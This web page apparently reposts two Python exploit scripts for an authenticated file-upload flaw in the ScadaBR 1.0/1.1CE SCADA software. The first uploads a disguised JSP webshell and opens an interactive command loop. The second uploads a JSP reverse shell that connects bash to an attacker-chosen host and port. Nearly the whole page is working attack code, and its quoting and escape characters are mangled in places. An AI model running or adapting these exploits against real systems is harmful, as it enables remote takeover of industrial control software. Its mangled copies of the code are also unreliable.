ScadaBR 1.0 Shell Upload ≈ Packet Storm – Digitalmunition




Exploit/Advisories no-image-featured-image.png

Published on April 1st, 2021 📆 | 3650 Views ⚑

0

ScadaBR 1.0 Shell Upload ≈ Packet Storm

# Exploit Title: ScadaBR 1.0 – Arbitrary File Upload (Authenticated) (1)
# Date: 03/2021
# Exploit Author: Fellipe Oliveira
# Vendor Homepage: https://www.scadabr.com.br/
# Version: ScadaBR 1.0, ScadaBR 1.1CE and ScadaBR 1.0 for Linux
# Tested on: Windows7, Windows10

#!/usr/bin/python

import requests,sys,time

if len(sys.argv) < =4:
print(‘[x] Missing arguments … ‘)
print(‘[>] Usage: python WinScada_RCE.py ‘)
print(‘[>] Example: python WinScada_RCE.py 192.168.1.24 8080 admin admin’)
sys.exit(0)
else:
time.sleep(1)

host = sys.argv[1]port = sys.argv[2]user = sys.argv[3]passw = sys.argv[4]

flag = False
LOGIN = ‘http://’+host+’:’+port+’/ScadaBR/login.htm’
PROTECTED_PAGE = ‘http://’+host+’:’+port+’/ScadaBR/view_edit.shtm’

banner = ”’
+-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-+
| _________ .___ ____________________ |
| / _____/ ____ _____ __| _/____ ______ ______ |
| _____ _/ ___\__ / __ |__ | | _/| _/ |
| / ___ / __ _/ /_/ | / __ | | | | |
| /_______ /___ >____ /____ |(____ /______ /|____|_ / |
| / / / / / / / |
| |
| > ScadaBR 1.0 ~ 1.1 CE Arbitrary File Upload |
| > Exploit Author : Fellipe Oliveira |
| > Exploit for Windows Systems |
+-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-+
”’

def main():
payload = {
‘username’: user,
‘password’: passw
}

print(banner)
time.sleep(2)

with requests.session() as s:
s.post(LOGIN, data=payload)
response = s.get(PROTECTED_PAGE)

print(“[+] Trying to authenticate “+LOGIN+”…”)
if response.status_code == 200:
print(“[+] Successfully authenticated! :D~n”)
time.sleep(2)
else:
print(“[x] Authentication failed :(“)
sys.exit(0)

burp0_url = “http://”+host+”:”+port+”/ScadaBR/view_edit.shtm”
burp0_cookies = {“JSESSIONID”: “66E47DFC053393AFF6C2D5A7C15A9439”}
burp0_headers = {“User-Agent”: “Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0”, “Accept”: “text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8”, “Accept-Language”: “en-US,en;q=0.5”, “Accept-Encoding”: “gzip, deflate”, “Content-Type”: “multipart/form-data; boundary=—————————6150838712847095098536245849”, “Origin”: “http://”+host+”:”+port+”/”, “Connection”: “close”, “Referer”: “http://”+host+”:”+port+”/ScadaBR/view_edit.shtm”, “Upgrade-Insecure-Requests”: “1”}
burp0_data = “—————————–6150838712847095098536245849rnContent-Disposition: form-data; name=”view.name”rnrnrn—————————–6150838712847095098536245849rnContent-Disposition: form-data; name=”view.xid”rnrnGV_218627rn—————————–6150838712847095098536245849rnContent-Disposition: form-data; name=”backgroundImageMP”; filename=”win_cmd.jsp”rnContent-Type: application/octet-streamrnrn< %@ page import="java.util.*,java.io.*"%>n< %n%>n

nCommands with JSPn
nnn

n

n< %nif (request.getParameter("cmd") != null) {n    out.println("Command: " + request.getParameter("cmd") + "
");n Process p;n if ( System.getProperty("os.name").toLowerCase().indexOf("windows") != -1){n p = Runtime.getRuntime().exec("cmd.exe /C " + request.getParameter("cmd"));n }n else{n p = Runtime.getRuntime().exec(request.getParameter("cmd"));n }n OutputStream os = p.getOutputStream();n InputStream in = p.getInputStream();n DataInputStream dis = new DataInputStream(in);n String disr = dis.readLine();n while ( disr != null ) {n out.println(disr);n disr = dis.readLine();n }n}n%>n

nnrn—————————–6150838712847095098536245849rnContent-Disposition: form-data; name=”upload”rnrnUpload imagern—————————–6150838712847095098536245849rnContent-Disposition: form-data; name=”view.anonymousAccess”rnrn0rn—————————–6150838712847095098536245849–rn”
getdata = s.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, data=burp0_data)

print(‘[>] Attempting to upload .jsp Webshell…’)
time.sleep(1)
print(‘[>] Verifying shell upload…n’)
time.sleep(2)

if getdata.status_code == 200:
print(‘[+] Upload Successfuly!’)

for num in range(1,500):
PATH = ‘http://’+host+’:’+port+’/ScadaBR/uploads/%d.jsp’ % (num)
find = s.get(PATH)

if find.status_code == 200:
print(‘[+] Webshell Found in: http://’+host+’:’+port+’/ScadaBR/uploads/%d.jsp’ % (num))
flag = True
print(‘[>] Spawning fake shell…’)
time.sleep(3)

while flag:
param = raw_input(“# “)
burp0_url = “http://”+host+”:”+port+”/ScadaBR/uploads/%d.jsp?cmd=%s” % (num,param)
burp0_cookies = {“JSESSIONID”: “4FCC12402B8389A64905F4C8272A64B5”}
burp0_headers = {“User-Agent”: “Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0”, “Accept”: “text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8”, “Accept-Language”: “en-US,en;q=0.5”, “Accept-Encoding”: “gzip, deflate”, “Connection”: “close”, “Referer”: “http://”+host+”:”+port+”/ScadaBR/uploads/%d.jsp?cmd=%s”, “Upgrade-Insecure-Requests”: “1”}
send = s.get(burp0_url, headers=burp0_headers, cookies=burp0_cookies)
clean = send.text.replace(‘

', '').replace('
', '').replace('"GET" NAME="myform" ACTION="">', '').replace('Commands with JSP', '').replace('', '').replace('', '').replace('
', '').replace('
', '').replace('

‘, ”).replace(”, ”)
print(clean)

elif num == 499:
print(‘[x] Webshell not Found’)

else:
print(‘Reason:’+getdata.reason+’ ‘)
print(‘Exploit Failed x_x’)

if __name__ == ‘__main__’:
main()

————————————-
# Exploit Title: ScadaBR 1.0 – Arbitrary File Upload (Authenticated) (2)
# Date: 04/21
# Exploit Author: Fellipe Oliveira
# Vendor Homepage: https://www.scadabr.com.br/
# Version: ScadaBR 1.0, ScadaBR 1.1CE and ScadaBR 1.0 for Linux
# Tested on: Debian9,10~Ubuntu16.04

#!/usr/bin/python

import requests,sys,time

if len(sys.argv) < =6:
print(‘[x] Missing arguments … ‘)
print(‘[>] Usage: python LinScada_RCE.py ‘)
print(‘[>] Example: python LinScada_RCE.py 192.168.1.24 8080 admin admin 192.168.1.50 4444’)
sys.exit(0)
else:
time.sleep(1)

host = sys.argv[1]port = sys.argv[2]user = sys.argv[3]passw = sys.argv[4]rev_host = sys.argv[5]rev_port = sys.argv[6]

flag = False
LOGIN = ‘http://’+host+’:’+port+’/ScadaBR/login.htm’
PROTECTED_PAGE = ‘http://’+host+’:’+port+’/ScadaBR/view_edit.shtm’

banner = ”’
+-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-+
| _________ .___ ____________________ |
| / _____/ ____ _____ __| _/____ ______ ______ |
| _____ _/ ___\__ / __ |__ | | _/| _/ |
| / ___ / __ _/ /_/ | / __ | | | | |
| /_______ /___ >____ /____ |(____ /______ /|____|_ / |
| / / / / / / / |
| |
| > ScadaBR 1.0 ~ 1.1 CE Arbitrary File Upload |
| > Exploit Author : Fellipe Oliveira |
| > Exploit for Linux Systems |
+-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-+
”’

def main():
payload = {
‘username’: user,
‘password’: passw
}

print(banner)
time.sleep(2)

with requests.session() as s:
s.post(LOGIN, data=payload)
response = s.get(PROTECTED_PAGE)

print “[+] Trying to authenticate “+LOGIN+”…”
if response.status_code == 200:
print “[+] Successfully authenticated! :D~n”
time.sleep(2)
else:
print “[x] Authentication failed :(“
sys.exit(0)

burp0_url = “http://”+host+”:”+port+”/ScadaBR/view_edit.shtm”
burp0_cookies = {“JSESSIONID”: “8DF449C72D2F70704B8D997971B4A06B”}
burp0_headers = {“User-Agent”: “Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0”, “Accept”: “text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8”, “Accept-Language”: “en-US,en;q=0.5”, “Accept-Encoding”: “gzip, deflate”, “Content-Type”: “multipart/form-data; boundary=—————————32124376735876620811763441977”, “Origin”: “http://”+host+”:”+port+”/”, “Connection”: “close”, “Referer”: “http://”+host+”:”+port+”/ScadaBR/view_edit.shtm”, “Upgrade-Insecure-Requests”: “1”}
burp0_data = “—————————–32124376735876620811763441977rnContent-Disposition: form-data; name=”view.name”rnrnrn—————————–32124376735876620811763441977rnContent-Disposition: form-data; name=”view.xid”rnrnGV_369755rn—————————–32124376735876620811763441977rnContent-Disposition: form-data; name=”backgroundImageMP”; filename=”webshell.jsp”rnContent-Type: image/pngrnrn < %@page import="java.lang.*"%>n< %@page import="java.util.*"%>n< %@page import="java.io.*"%>n< %@page import="java.net.*"%>nn< %nclass StreamConnector extends Thread {n InputStream is;n OutputStream os;n StreamConnector(InputStream is, OutputStream os) {n this.is = is;n this.os = os;n }n public void run() {n BufferedReader isr = null;n BufferedWriter osw = null;n try {n isr = new BufferedReader(new InputStreamReader(is));n osw = new BufferedWriter(new OutputStreamWriter(os));n char buffer[] = new char[8192];n int lenRead;n while ((lenRead = isr.read(buffer, 0, buffer.length)) > 0) {n osw.write(buffer, 0, lenRead);n osw.flush();n }n } catch (Exception e) {n System.out.println(“exception: ” + e.getMessage());n }n try {n if (isr != null)n isr.close();n if (osw != null)n osw.close();n } catch (Exception e) {n System.out.println(“exception: ” + e.getMessage());n }n }n}n%>nn

Payload JSP to Reverse Shell

n

Run nc -l 1234 on your client (127.0.0.1) and click Connect. This JSP will start a bash shell and connect it to your nc process

n

ntIP AddressntPortntn

nn< %n String ipAddress = request.getParameter("ipaddress");n String ipPort = request.getParameter("port");n Socket sock = null;n Process proc = null;n if (ipAddress != null && ipPort != null) {n try {n sock = new Socket(ipAddress, (new Integer(ipPort)).intValue());n System.out.println("socket created: " + sock.toString());n Runtime rt = Runtime.getRuntime();n proc = rt.exec("/bin/bash");n System.out.println("process /bin/bash started: " + proc.toString());n StreamConnector outputConnector = new StreamConnector(proc.getInputStream(), sock.getOutputStream());n System.out.println("outputConnector created: " + outputConnector.toString());n StreamConnector inputConnector = new StreamConnector(sock.getInputStream(), proc.getOutputStream());n System.out.println("inputConnector created: " + inputConnector.toString());n outputConnector.start();n inputConnector.start();n } catch (Exception e) {n System.out.println("exception: " + e.getMessage());n }n }n if (sock != null && proc != null) {n out.println("

“);n out.println(“

Process /bin/bash, running as (” + proc.toString() + “, is connected to socket ” + sock.toString() + “.

“);n }n%>nnrn—————————–32124376735876620811763441977rnContent-Disposition: form-data; name=”upload”rnrnUpload imagern—————————–32124376735876620811763441977rnContent-Disposition: form-data; name=”view.anonymousAccess”rnrn0rn—————————–32124376735876620811763441977–rn”
getdata = s.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, data=burp0_data)

print(‘[>] Attempting to upload .jsp Webshell…’)
time.sleep(1)
print(‘[>] Verifying shell upload…n’)
time.sleep(2)

if getdata.status_code == 200:
print(‘[+] Upload Successfuly! n’)

for num in range(1,1000):
PATH = ‘http://’+host+’:’+port+’/ScadaBR/uploads/%d.jsp’ % (num)
find = s.get(PATH)

if find.status_code == 200:
print(‘[+] Webshell Found in: http://’+host+’:’+port+’/ScadaBR/uploads/%d.jsp’ % (num))
print(‘[>] Spawning Reverse Shell…n’)
time.sleep(3)

burp0_url = “http://”+host+”:”+port+”/ScadaBR/uploads/%d.jsp?ipaddress=%s&port=%s&Connect=Connect” % (num,rev_host,rev_port)
burp0_cookies = {“JSESSIONID”: “8DF449C72D2F70704B8D997971B4A06B”}
burp0_headers = {“User-Agent”: “Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0”, “Accept”: “text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8”, “Accept-Language”: “en-US,en;q=0.5”, “Accept-Encoding”: “gzip, deflate”, “Connection”: “close”, “Upgrade-Insecure-Requests”: “1”}
r = s.get(burp0_url, headers=burp0_headers, cookies=burp0_cookies)
time.sleep(5)

if len(r.text) > 401:
print(‘[+] Connection received’)
sys.exit(0)
else:
print(‘[x] Failed to receive reverse connection …n’)

elif num == 999:
print(‘[x] Failed to found Webshell … ‘)

else:
print(‘Reason:’+getdata.reason+’ ‘)
print(‘Exploit Failed x_x’)

if __name__ == ‘__main__’:
main()

Source link

Tagged with:



Leave a Reply